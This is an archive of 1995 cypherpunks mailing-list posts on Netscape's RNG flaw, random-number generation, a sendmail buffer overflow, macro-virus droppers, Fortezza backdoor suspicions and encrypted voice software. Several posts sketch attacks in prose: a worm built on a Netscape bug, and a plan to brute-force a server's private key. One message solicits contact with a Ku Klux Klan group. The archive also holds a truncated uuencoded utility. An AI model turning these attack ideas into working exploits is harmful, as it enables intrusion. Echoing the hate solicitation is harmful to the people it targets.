special thanks to Tim May for his references. dvw From tomw at orac.engr.sgi.com Fri Sep 22 17:50:37 1995 From: tomw at orac.engr.sgi.com (Tom Weinstein) Date: Fri, 22 Sep 95 17:50:37 PDT Subject: netscape bug Message-ID: <199509230049.RAA06102@orac.engr.sgi.com> I said: In article , "Perry E. Metzger" writes: >> I can tell you in general terms -- I don't write MIPS assembler >> myself. However, I will point out to you that you use an ancient >> Sendmail, and that it uses syslog(3) on user produced data, and that >> syslog uses a static buffer. Trick sendmail into logging something >> very big, and you can do what you like. The 8lgm people wrote a demo >> for Sparc as a proof of concept. > Hmm, after having looked at the syslogd code, it looks like this > particular bug has been fixed for at least several years. However, > there sure are a hell of a lot of fixed size buffers being alocated off > the stack and some of them are being used in unsafe ways. Whoops. Having done a little more checking, it appears that this bug does indeed occur in all current version of Irix. There's a patch for it (patch 825) that will be out imminently. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at engr.sgi.com From crocker at cybercash.com Fri Sep 22 17:52:27 1995 From: crocker at cybercash.com (Stephen D. Crocker) Date: Fri, 22 Sep 95 17:52:27 PDT Subject: Pitfall in producing random numbers Message-ID: At 2:20 AM 9/22/95, Norman Hardy wrote: >The virtual PC clock proceeded forward by very predictable >manner. Perhaps the details were different but the nature of the pitfall is >clear. I did not notice that pitfall mentioned in RFC 1750. (Its the only >hazard that I know of that they missed.) Neat! I often talk about what happens if inter-keystroke timingis used but the program is driven by a script. In essence, running a program under simulation amounts to running the clock under a script. Next version. Thanks, Steve -------------------- Steve Crocker Main: +1 703 620 4200 CyberCash, Inc., Suite 430 Desk: +1 703 716 5214 2100 Reston Parkway Fax: +1 703 620 4215 Reston, VA 22091 crocker at cybercash.com From aleph1 at dfw.net Fri Sep 22 17:53:21 1995 From: aleph1 at dfw.net (Aleph One) Date: Fri, 22 Sep 95 17:53:21 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: Actually it allows you to imbed data and commands to run. What the latest MSWord virus did is imbed a virus dropper encoded in the word document and then run it trough the dos debug command to make it a binary file (if you ever read the 40HEX virus magazine you should know how this works). >From there it just run the dropper. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Fri, 22 Sep 1995 dmandl at panix.com wrote: > Is that the new MS-Word you're thinking of? I hear that it lets you > imbed macros containing executable code in documents. That's got to > be one of the most dangerous ideas ever cooked up. > > --Dave. > > -- > Dave Mandl > dmandl at panix.com > http://wfmu.org/~davem > From tcmay at got.net Fri Sep 22 18:27:21 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 22 Sep 95 18:27:21 PDT Subject: "Going after Netscape" Message-ID: At 12:37 AM 9/23/95, Jim Ray wrote: >I'm with Lucky, let's go after Netscape itself. They deserve it more >than their customers do, and they would then have a strong motivation > to fix it. The press release would then *only* involve >Netscape, and maybe a few C-punks could buy a few Netscape puts ;) >and donate the bucks made for something like Tim's stable remailer. I think we need to be very careful not to do things like we have a vendetta against Netscape. Netscape has a Cypherpunks presence, of course, and His Andreeseeness was even on the list for a while last December. Today's "San Jose Mercury News" had a photo of Goldberg and Wagner and a fairly long article about how James Barksdale, Pres. of Netscape, plans to hire them to help improve Netscape's security. He even made noises about thanking them for their cracking efforts, and said improving Netscape's security is a high priority. It's sort of hard for me to imagine a company being more "Cypherpunks friendly" than this. (I mean about the issues that interest us.) So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've seen Netscape bomb on certain sites, as with the Cypherpunks archive site, as several of us noted a few months ago...probably a different problem, but indicative that Netscape can be corrupted). But let's be careful not to convey any flavor of this being a vendetta. --Tim May Notice: Don't expect me to reply to trivial questions and complaints. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From herbs at interlog.com Fri Sep 22 18:32:03 1995 From: herbs at interlog.com (Herb Sutter) Date: Fri, 22 Sep 95 18:32:03 PDT Subject: WordBasic and other macro languages Message-ID: <199509230130.VAA04956@gold.interlog.com> At 15:47 1995.09.22 -0400, dmandl at panix.com wrote: >On Fri, 22 Sep 1995, Adam Shostack wrote: >> I keep hearing this thought. Isn't Win95 with its >> 'executables in email' much more dangerous than Java, which at least >> tries to address security? > >Is that the new MS-Word you're thinking of? I hear that it lets you >imbed macros containing executable code in documents. That's got to >be one of the most dangerous ideas ever cooked up. It's no worse than the other hundreds of products that have macro languages that can write files (even the ones that can't execute other programs are dangerous if they can write a real executable to a file and, say, add a corresponding RUN= line in a WIN.INI or the equivalent to get it executed later). Word's is just more visible because the macro itself can behave like a virus, because of Word's autoexec-macro feature that can make the macro run automatically unless they user disables those options on his copy. Many versions of PostScript have this kind of hole, I understand; some disable the file-manipulation commands to be more secure. I remember hearing recently that Ghostscript, popular on PCs, is one that does have the file-manips, but all of this is hearsay so I can't say for sure. Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From herbs at interlog.com Fri Sep 22 18:33:29 1995 From: herbs at interlog.com (Herb Sutter) Date: Fri, 22 Sep 95 18:33:29 PDT Subject: Notes security question Message-ID: <199509230133.VAA05532@gold.interlog.com> While I'm at it, here's a question I've been wondering about recently: Why is it I've never heard of any security issues with Lotus Notes? Are there no known weaknesses? Or did existing weaknesses just not get much press because Notes isn't a commercially visible consumer product like Netscape? Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From tcmay at got.net Fri Sep 22 18:45:16 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 22 Sep 95 18:45:16 PDT Subject: More on "Entropy" Message-ID: At 6:46 PM 9/22/95, David Van Wie wrote: >Having overcome my initial skepticism on the entire topic of entropy, based >on the useful pointers to the literature I have received, I agree >wholeheartedly with the need for _positive_ design criteria against which >designs may be evaluated. For initial consideration, I recommend the >following: > >The entropy E is defined by the sum across n states of -P_i log_2(P_i), Hah! Another physicist converted to the information-theoretic view of entropy! I should've pointed out in my reading list that several names stand out in this interpretation: - Charles Bennett - Rolf Landauer - John Wheeler Just so you know. ObNetscapeHack: None. --Tim May Notice: Don't expect me to reply to trivial questions and complaints. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From aleph1 at dfw.net Fri Sep 22 19:37:44 1995 From: aleph1 at dfw.net (Aleph One) Date: Fri, 22 Sep 95 19:37:44 PDT Subject: Council of Europe proposes to outlaw strong encryption (fwd) In-Reply-To: <199509221509.LAA09991@panix.com> Message-ID: I'll jump into this conversation for a second. I been wanting to set up and IP proxy using Linux. It was support for IP over IP tunnels, and IP Masquareding. Only thing is needed is to encrypt to IP over IP tunnel. Just my $0.02. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Fri, 22 Sep 1995, Duncan Frissell wrote: > This should prove about as effective as the current French or Russian bans. > What are they going to do when they figure out that there need no longer be > such a thing as a telecoms operator. We do most of the message packaging > ourselves. It will be a bit difficult for any connectivity supplier to tell > what's going out via one of our encrypted IP sessions. > > Question for Perry -- I'm assuming that it will soon be possible to > originate encrypted TCP/IP sessions with a distant "process" somewhere. Do > you see technical problems with a TCP/IP laundry being established > "somewhere" that strips trace info from one of my processes and prevents > back tracing beyond the mouth of this encrypted pipe? > > Also Perry, what did you think of the article "How Anarchy Works" in the > latest Wired on the IETF? > > DCF > From tcmay at got.net Fri Sep 22 19:41:09 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 22 Sep 95 19:41:09 PDT Subject: T-Shirt Spams Message-ID: At 3:42 PM 9/22/95, Don Henson wrote: >By now, everyone knows about the TSHIRT that has been classified as a >MUNITION by the US Goverment. If you don't know, just send email to Oh, really? Which government agency declared this t-shirt to be a munition? Inquiring minds want to know. (I wouldn't say more, except these t-shirt spams are getting wearisome.) --Tim May Notice: Don't expect me to reply to trivial questions and complaints. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From bugs at ritz.mordor.com Fri Sep 22 20:15:36 1995 From: bugs at ritz.mordor.com (Mark Hittinger) Date: Fri, 22 Sep 95 20:15:36 PDT Subject: another net phone (crypto) Message-ID: <199509230313.XAA08112@ritz.mordor.com> I haven't seen this on the cypherpunk list so I thought I would forward it as an FYI. Interesting that source code is available! >Subject: FWD: Free secure Internet voice communication >From: John Walker >Subject: Free secure Internet voice communication > > I've just released to the public domain Release 5 of Speak Freely for > Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics > workstations. Assuming you have a fast enough connection to the > Internet (with reasonably consistent packet delivery time) and/or a > fast enough CPU to perform audio compression in real time, you can > talk to anybody on Earth connected to the Internet who's also running > the program. The Windows and Unix versions have entirely different > user interfaces, but can intercommunicate. Complete source code is > available. > > For communications security, IDEA, DES (less initial and final > permutations), and one-time pad (re-used for each sound packet) > encryption are available. The intensely paranoid can enable any > combination of these. The documentation explains how to use PGP to > securely exchange session keys before a conversation; an automatic > session key generator is provided. DES is included for commercial > users who don't have a license to use the IDEA patent. One-time pad > encryption is for those with machines too slow to run IDEA or DES in > real time. > > I didn't include a public key mechanism because I wanted to avoid all > the confusion. If somebody wants to navigate the narrow strait > between the RSA patent Scylla and Charybdis of export controls, the > programming work to implement public keys is straightforward and the > source code is yours to hack. > > For further information, see: > > http://www.fourmilab.ch/netfone/windows/speak_freely.html > > which describes the Windows version in detail and contains pointers to > the Sun and SGI editions, as well as links to download source code and > a ready-to-run executable for Windows. You can also obtain the > program by anonymous binary FTP: > > Unix source code: > ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz > > Windows executable: > ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip > > Windows source code (for Visual C 1.5): > ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip > > Have Fun! Regards, Mark Hittinger Internet Manager WinNET Communications, Inc. bugs at win.net bugs at ritz.mordor.com From smart at mel.dit.csiro.au Fri Sep 22 20:20:29 1995 From: smart at mel.dit.csiro.au (Bob Smart) Date: Fri, 22 Sep 95 20:20:29 PDT Subject: speak freely Message-ID: <199509230320.AA01298@shark.mel.dit.csiro.au> "One Time! This must be some new meaning of `one time' that I'm not acquanted with." - apologies to Douglas Adams. ------- Forwarded Message Date: Fri, 22 Sep 95 16:11:20 PDT From: ari at es.net (Ari Ollikainen) Message-Id: <9509222311.AA27810 at viipuri.nersc.gov> To: RCWG at nic.hep.net, ESCC at viipuri.nersc.gov Subject: FWD: Free secure Internet voice communication Cc: rem-conf at es.net, videophone at es.net Found in my mailbox... From: John Walker Subject: Free secure Internet voice communication I've just released to the public domain Release 5 of Speak Freely for Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics workstations. Assuming you have a fast enough connection to the Internet (with reasonably consistent packet delivery time) and/or a fast enough CPU to perform audio compression in real time, you can talk to anybody on Earth connected to the Internet who's also running the program. The Windows and Unix versions have entirely different user interfaces, but can intercommunicate. Complete source code is available. For communications security, IDEA, DES (less initial and final permutations), and one-time pad (re-used for each sound packet) encryption are available. The intensely paranoid can enable any combination of these. The documentation explains how to use PGP to securely exchange session keys before a conversation; an automatic session key generator is provided. DES is included for commercial users who don't have a license to use the IDEA patent. One-time pad encryption is for those with machines too slow to run IDEA or DES in real time. I didn't include a public key mechanism because I wanted to avoid all the confusion. If somebody wants to navigate the narrow strait between the RSA patent Scylla and Charybdis of export controls, the programming work to implement public keys is straightforward and the source code is yours to hack. For further information, see: http://www.fourmilab.ch/netfone/windows/speak_freely.html which describes the Windows version in detail and contains pointers to the Sun and SGI editions, as well as links to download source code and a ready-to-run executable for Windows. You can also obtain the program by anonymous binary FTP: Unix source code: ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz Windows executable: ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip Windows source code (for Visual C 1.5): ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip The Sun and SGI versions of this program are quite stable, and should work for just about anybody with an adequate network connection. Porting the code to other Unix workstations with audio hardware should be relatively straightforward. The Windows version has just been finished and until it's shaken down on a variety of machines, networks, sound cards, etc. may not work for everybody. The Windows version requires a sound card with Windows Multimedia drivers (I've tested it on a variety of Sound Blasters of various generations) and a TCP/IP stack that supports WINSOCK (I'm using NetManage Chameleon NFS). Since multimedia and network hardware and drivers vary tremendously from machine to machine, I wouldn't be surprised if some tweaking were needed for various configurations. The CPU speed required interacts with the speed of your network connection; if you have a high-bandwidth connection to the Internet, or you're talking to another person on a high-speed LAN, there's no need to compress sound and the CPU load is minimal; just about any machine will do. If you need to compress in order to squeeze 8000 samples per second into a dial-up connection, then you need a CPU fast enough to run GSM compression in real time: basically we're talking a very fast 486 or Pentium. If you turn on IDEA and/or DES encryption, that also consumes CPU time. Based on my experience with other Windows programs, it will probably take months to track down misbehaviour due to strange hardware and software configurations. Complete, detailed bug reports are welcome. I may not be able to respond individually, but the Web page will track updates as they're released. I have tested the program only on vanilla 16 bit Windows 3.1. The Windows version contains preliminary code to support direct dial-up modem connections, acting as a phone scrambler. Serial port support in most Windows machines is so poor (unless you have a 16550A UART and appropriate drivers, which most people don't) that this feature isn't usable at present. I've left the code in just in case somebody with suitable hardware wants to bash it into working form. If you add features, port the program to 32 bits, fix bugs, etc., let me know so I can make your contributions generally available. -------------------- ------------------- John Walker | A sufficiently advanced Internet: kelvin at fourmilab.ch | technology is indistinguishable | from a rigged demo. ------- End of Forwarded Message From jcorgan at aeinet.com Fri Sep 22 20:35:47 1995 From: jcorgan at aeinet.com (jcorgan at aeinet.com) Date: Fri, 22 Sep 95 20:35:47 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: > Irregardless, it's a nasty bug given that you can crash anyone's >netscape. And on Mac/Win3.1, it may even require a reboot. Testing here with Win95 results in the equivalent of a segmentation fault...nicely handled. From gnu at toad.com Fri Sep 22 21:00:41 1995 From: gnu at toad.com (John Gilmore) Date: Fri, 22 Sep 95 21:00:41 PDT Subject: The Fortezza random number generator is not trustworthy Message-ID: <9509230400.AA19805@toad.com> > Yes Fortezza cards can be instructed to produce a random number through one > of its library calls (someday they'll have a real API). One of the > diagnostic tools I had tested this function. What algorithm do they use? > Haven't a clue. Sources say that the RNG implementation may vary from vendor > to vendor (i.e., GTC, Spyrus, Mykotronix, etc.). A caution. I believe that CAPSTONE chips inside the Fortezza card are highly likely to have back doors in them, above and beyond the Clipper key escrow feature. In particular, the random number generator is probably compromised. Many of the top-secret NSA documents I have received under FOIA about Clipper say things like: "2. I briefed the Board on the CLIPPER and CAPSTONE chips and their capabilities and summarized the recommendations of the 19 November session: [TWO INCHES OF SOLID BLACKOUT] "3. The Policy Board reached consensus on the following points: [TWO LINES BLACKED OUT] a. NSA will provide for the availability from a vendor of a single chip which can be programed for law enforcement access exclusively through a key escrow "law enforcement exploitation field." The chip will have no trap doors or other methods of access. This chip is called CLIPPER. [THREE INCHES OF SOLID BLACKOUT] Note that they explicitly say "The chip will have no trap doors or other methods of access" when talking about Clipper, but all information about Capstone is blacked out. There's no such guarantee about Capstone. The Digital Signature Algorithm embedded in Capstone is the best "host algorithm" ever seen for subliminal channels. A subliminal channel is a means of communication which imparts information but cannot even be detected by third parties. By choosing numbers for DSA signatures that are not completely random, several subliminal channels are available, which can leak information as part of normal digital signatures. This subliminal information can only be read by someone who knows a secret about how the non-random numbers were generated. Gus Simmons, who did seminal work on subliminal channels while at Sandia Labs, wrote a Eurocrypt paper on this a year or two ago. The Capstone chip knows private things like your DSA private key, the last session key you loaded for Skipjack, etc. So it has info that is worth leaking to NSA wiretappers. Now the plot thickens. I submitted a FOIA request for all information the NSA had on subliminal channels. They responded that they had no information! We appealed and got the same answer. However, subliminal channels are clearly part of the crypto literature and knowledge base. They were a major concern when Gus designed nuclear test-ban verification crypto equipment in the '70s. The ONLY way NSA can legally claim to have no information on subliminal channels is if the MERE FACT OF THE EXISTENCE AT NSA of information on subliminal channels is classified. In other words, if their information ABOUT subliminal channels is classified, they can't say they have no documents; they have to say, e.g. "We have ten documents and they're all classified." If they have any documents, they can only legally claim to have no documents if just confirming the existence of the documents would itself reveal classified info. This is called "Glomarizing" and it's named for the Glomar Explorer, a ship which was secretly used for dredging up code books from sunken Soviet submarines. Merely confirming that records existed on the Glomar would have revealed classified information (i.e. that the government was involved; the cover story was that a private company was using it for deep-sea mining experiments). Apparently, merely confirming that NSA knows anything about subliminal channels would reveal classified information. If the mere existence of documents on subliminal channels is classified, it's probably because they are very actively and very secretly using them. And this tends to reinforce my perception that they are using them in Capstone, the heart of the Fortezza card. You're free to dismiss all this as paranoid rambling. However, if you use a Fortezza card to generate your random numbers, you have no way to determine how these numbers are being generated. Are they really random? How could you tell? Would you rather get "random" numbers from a classified NSA-designed chip that's part of a family designed to subvert your privacy? Or would you rather get them from a third-party product whose design you can actually verify? I'd prefer a random number generator where I can pull one "at random" from stock, take it apart, and verify that it really does what its designers say it does. John Gilmore From hallam at w3.org Fri Sep 22 21:42:57 1995 From: hallam at w3.org (hallam at w3.org) Date: Fri, 22 Sep 95 21:42:57 PDT Subject: "Gnusaic"? Why not a Gnu-Style Web Browser? In-Reply-To: Message-ID: <9509230442.AA07912@zorch.w3.org> >Has anyone already created the necessary patches for Apache >, or does anyone know whether the Apache dev >team would be amenable to including conditional directives to allow the >build of a secure version? If anyone is thinking of making the effort >to create a publicly available secure server, Apache's probably the >best source base to work with. I can't speak for Apatche but we have two of the developers in the building here. From what they have said security patches would be wellcomed with open arms. If anyone wants to do the same for the CERN server, we can roll it out through W3C likewise. The real issue though would be whetehr there was confidence in the security of the system. Simply bolting SSL in in a cack handed manner would not cut it IMHO. Basically I would not recommend a release of such a system to the Apatche group unless a I was happy with the security of the whole system. This may well involve a number of fixes in the rest of the code. I'm also very interested if anyone wants to brave S-HTTP, there is a public domain version in production. Basically the more people want to work on this type of stuff the better. The main hassle is in programming the authorization stuff however... don't underestimate the amount of work involved in doing a good job there. Phill From rjc at clark.net Fri Sep 22 22:16:31 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 22 Sep 95 22:16:31 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: <199509230513.BAA23938@clark.net> > > Actually it allows you to imbed data and commands to run. What the latest > MSWord virus did is imbed a virus dropper encoded in the word document > and then run it trough the dos debug command to make it a binary file > (if you ever read the 40HEX virus magazine you should know how this works). > From there it just run the dropper. You could make a worm out of this Netscape bug by having it look for a user's homepage when it infects, and then inserting the URL into that page. From jsw at neon.netscape.com Fri Sep 22 23:01:03 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Fri, 22 Sep 95 23:01:03 PDT Subject: The Next Hack In-Reply-To: <199509211832.LAA24086@infinity.c2.org> Message-ID: <4407p5$on4@tera.mcom.com> In article <199509211832.LAA24086 at infinity.c2.org>, sameer at c2.org (sameer) writes: > Now that we've seen that Netscape is doing a good job towards > trying to fix the hole that Ian and David have uncovered, it's time to > start looking at new things. > > Given the recent post to the www-security list that was > forwarded here, it seems like just replacing the server may not work > for all the secure servers out there-- keys may have to be replaced as > well. Let's find out. > > Proposal for action: > > 1) Reverse-engineer a server to see if the keygen phase uses > a weak RNG seed. -- if so, determine the exact algorithim. > > 2) Organize a net-wide search over the space of the RNG seed to > crack the private key of some well known secure server. > > 3) Release the private key to the net. What exactly is the point of this? We have: 1) acknowledged that the RNG used in the server private-key generation has the same problem 2) said that we will provide a patch early next week 3) said that we will provide new certificates for all customers 4) promised to make source code for our new seed generation code publicly available What else do you hope to gain by breaking a server key? I think the point has been made. Is there anything else that you would reasonably expect that we would do in response to a server key being broken that we have not already done? --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From pierre at shell.portal.com Fri Sep 22 23:37:50 1995 From: pierre at shell.portal.com (Pierre Uszynski) Date: Fri, 22 Sep 95 23:37:50 PDT Subject: Project: a standard cell random number generator Message-ID: <199509230636.XAA25093@jobe.shell.portal.com> At 9:50 PM 9/20/95, John Gilmore wrote: >You probably can't build a hardware random number generator out of >existing "gate array" gates or "standard cell" cells, because all the >existing gates and cells are designed to behave completely >predictably! It will take designing a new circuit structure. Actually, even without going into the more analog characteristics of these same standard cells (as Tim suggests: threshold measurement, DRAM discharge time, and so on) you can do that using the really basic behavior of really basic standard cells: I did that some 8 years ago around a free-running ring oscillator (a bunch of basic logic gates in a ring). The problem I would look into first is that any such random number generator (even the ones based on measurements of analog quantities) would likely synchronize to some extend to the local noise (like CMOS switching noise in sync with the chip clock). My impression is that if you try and make the thing more impervious to noise, it will be less random too, and the most prominent noise in such chips is not random at all. So, you could try to make it run fast, and place it in a slow chip (like an older style UART), or you could try to kick it out of sync now and then based on some external conditions (maybe) (bus signal arrival time, serial line input, etc). It's not guaranteed it would end up generating anything useful (maybe not even to seed a software PRNG). I still like the idea of using macroscopic events, many orders of magnitude different from system operating frequencies: mouse location and timing sounds good. If you want to get large amounts of random numbers, use a specially designed separate box, well shielded, and running on batteries (like a walkman :-) And a cryptographically secure software hash is always necessary. Pierre. pierre at shell.portal.com From rooster at ix.netcom.com Sat Sep 23 01:48:01 1995 From: rooster at ix.netcom.com (BRIAN PROBST ) Date: Sat, 23 Sep 95 01:48:01 PDT Subject: No Subject Message-ID: <199509230847.BAA22935@ix8.ix.netcom.com> IN TOUCH TO THE LOCAL KLAVERN IN THE DALLAS AREA?IF SO THEN SEND ME E-MAIL AT: ROOSTER at IX.NETCOM.COM From edgar at highnrg.sbay.org Sat Sep 23 02:26:21 1995 From: edgar at highnrg.sbay.org (Edgar Swank) Date: Sat, 23 Sep 95 02:26:21 PDT Subject: SecureDrive/Secure Device News Message-ID: <79BVBD6w165w@highnrg.sbay.org> -----BEGIN PGP SIGNED MESSAGE----- My thanks to Mark Grant who suggested re the Iomega zip Drive & Secure Device: On Sat, 16 Sep 1995, Edgar Swank wrote: >problem is that the DOS file must be present when the CONFIG.SYS >DEVICE= statement for the SECDEV.SYS is processed. But the zip drive >driver is a TSR that doesn't get loaded until after all DEVICE >statements have been processed. There are programs around that will load DOS device drivers from the DOS command line after booting, there's one I've used at work called 'DEVLOD', but I don't know if it's commercial or freeware. If it's free it may be possible to find it on the Net somewhere. I found several shareware/freeware programs which claim to have this ability. The first one I tried, DMC35.ZIP 74710 11-29-93 Allows loading/unloading of dev. drivers /TSR's did the job, loading SECDEV.SYS -after- the zip drive TSR was loaded. Other possibilities, which are present in the SIMTEL archive in the msdos/sysutil subdirectory would be, comp.zip 5086 08-29-88 Load and unload device drivers after bootup devic104.zip 7250 05-30-92 Load and unload device drivers after bootup devlod.zip 18240 12-30-91 Dynamic load of device drivers after boot-up drvins11.zip 12298 12-06-90 Load and unload device drivers after bootup idrv01.zip 16369 04-10-92 Install/uninstall device drivers after bootup although I haven't tried any of these. - From a SecureDrive user comes the following warning: Norton Utilities' wipeinfo appears to CORRUPT a SecureDrive (1.3d) partition, and well as an SFS (1.17) one. That was with the F-PROT (2.19) anti-virus TSR in memory (virstop.exe). I did not encounter problems with it off. I think the main fault would be with virstop. The user didn't say, but if virstop is loaded before sectsr, that could lead to bypassing sectsr, accessing encrypted data directly, which is likely to corrupt the whole partition. A user has also informed me that RAWDSK11 (or RAWDRV11) is no longer found at ftp.uni-duisburg.de: /pub/pc/misc/rawdsk11.zip This is a utility useful with SecureDrive for tape backups. Since it's a short program, I'll include a UUENCODED image of the file here. This program does not do cryptography by itself, so ITAR does not apply. Edgar Swank SecureDrive Co-author section 1 of uuencode 5.25 of file rawdrv11.zip by R.E.M. begin 644 rawdrv11.zip M4$L#!!0``@`(`$`)/1LU[E/**P$``-4!```+````2$E35$]262Y46%1-D<]. M`C$0QL^0\`*>Y@$0Q:,W=&,D'$R`Z'E*9Y<)I273V<5]>ZS at GSRV3?T#O64V#`2BJ,)DJ"0PL MVMO-I:29#FHG3>8$N`@-IH1F>]]\[.#U?=/L-J!'CB>.'6Q77\UZMUDTVT_@ M#!BKB4. at SN*\\$"+2F!`OSQS,Z/^Y6:XB@%9DJ;;L#EP"UC#(EW!LU2JL5*/ MI:KXE**%2E9P9,\@BR9X6^WM>[4Z*LE"Z$M\1UH%."`'=('`C6H#I%C/_[`` M^Z,5".4^&""?S^09E8+U1D"#R2=H^V`3BB0I#R(A-][N57IS?SA0SJ8L65KX MTH4$R_[6,YN6G_]^`%!+`P04``(`"```"#0;04L_X$08 M``!;/```"P```%)!5T1)4TLN1$]#E5M;P&Z0Q*J[P330HIG*C]_SG0/T1=),DDE59M2-!@[. M]3L7CDL\OU.+F3N7FP69&Y;5],+4*3NDL,]XK M72E=KVVH=7U4>UV'WI=NH[3*K;]7FA:JVFR;0M>\W<86!J?(_]HO%BYK2E,% M':RKGKQ=Z75AL.NEJP*M\H.WYW.UK$+M\B:3K]LWK^9J(70O*Q]T4>A'"UZW M"V[V>.5[[]ZT[U;&!W5K,E<2B;E^O/"'N?J at L_MF3SS):9T/KC:J\;;:#GG; M?O%VKC[;TLIM/2[V_+I_GZN/36AHMX5Y,(7;@T4=]YY/]$A#,5 M=CJH4N^',AR/]J[&-B*]G:YSEN!D2U]5:GVDA\3#.ISP-8D1V;&P56[JJ2*I M.*7'H\)M;:8+.12GS=5J9]2G!1UC-!/$RF-R-:$'N7*U.M0VD$RGXU'8U:[9 M[IY1&&)7W)EW53HO;64]T+%=-9T[/;!T:7)QYXIA0U940C:S-AMA37$ M at AG^;2JV@;`C0ANOMVP.NCJJ_UU>GOS'&8F&F%#2B=C*!L^\6VNP>BW*Z=TF M'.C^XQ%H+?4]]).N05O)"E9$OD,4F$AO:RI3$T/T?E\[G>W&H[0L*=3.'0S_ M!VUJ/)VN]LY[R_0ZU7 at 26%$Z'T`OJ#>;1G2D";:@*QOF1JDKNR>Q![YE2P-8 MOB0)1.M3T!M0CC5YWVNHC-;3SL41=!-YUH]'QN]-9EGK= M01ULV$5KH3\]FP&=4$,K=:6^W)W at U0_S,U996=P*C'C,IM*]XC]A9^/13GM5 MPB'P1N=GK]ZH9#@>7[Q]K41G^:_SMVI'%_0SM3:9)BK'(V(GT6FT/X)+N2%) MNR-?/XO>4.1FU&'GB.5\MG@?W'`\DBN*,.-UHT+[OM(5^HAOP,A(WWBT=DV5 MZYHD-!>7\W,>5W758YWME:ET14Q7#8DL6:U71NZS-H4[C!7/Q'; MN_B at J[B#`JW\R8`5'D_!AO'(&_`KP/#ALU_^_>5<7:S7-?&"GQ+)I1?M%IT, M.^=IAYT[L"N%(PR*A.<.)I^K:]?YP?A0K4TX&%/UV,)DS<0]$6]TH3PXO&(]ZDQUREUZX.K;Z)(V`= MPIH2"K1EO*%>7M4U;68K&ZPN[-]ZT;EU9+AXX71N\I?B=RIQ$J!793N3W<-Y MU#W-5:8*]9'5P%:9JQ%HHA+R#G]TC2KU,='7C_.J;(I@]W"2E@@5JG.[V9B: MHWRG]7-UI;,=+R.!5N:0 at DD,AZ"P-BQ+2XA1O\NUHL?C49V,#BEAWD6VR)YR0GVG`JCH'HBR*5*$;D1DZU-J,& M)J,:<3]IU_D9$=/4$%E-X!V(+%@A at Z3XNH&VZCZ?=-`^U$W&V(Q8N-?>]]U4<"0`.FI3 MN[)_+["*@0]>`OF8C at 4DYJ@MXY'Y3D\MWRXJ<\=#!AI&6.CWKN)H^.4.A,J* M\6CBC5'L1Z8IX.D6DNI*;+^-YTKH,L?G"H%V$30`UDL?[J"Z&^5JIIR M;>I.!9[(&;[)=Q>/'Z@)A\_S:9\E?N>:@A at N?"!^5'-UQKB)UFQL[4.'12/Z M(]Z=B]B\.KR*86S^.3]W>KB=D7K?GL^GY^?O7K]"Z1' MHJ-F%B3Q-C+&AVRD$C_%R[?O:;]][2+6;?;0D7:3750`N&H$?ODTGD8?%D at - MZ#/Z!A2JO&$=^[`D*2VO5^K\]6X\JH$#;":*(PSX='6Q@'%^6OQ+$NJNRR?FQT-$T?ZNOBQ^-9&M@*`K)^Z].Z8UAG_5YGM0"X+6:R=I!`,Z M66\VNBG"7-T91.)2U_>^\QB='42*[ZXN5S>WH/GNZA<4XWP^?_O/:4.":PCZ MH=;9?:L-+:]^7J):E?J[+9L2'[T="'<\BM)5SP at WZ2VN<:G>__P]SI[7:]^[ M2JNED4+!.GC3JO-XQ+F>_V=O\EA1?_$N%Y4RWW6Y+\P[_!E16O;NSWG]\.O/^]1OZ5_;^_'?TIZ%_GYV=M?>,(=8_&R+A>`6Q)ZT3 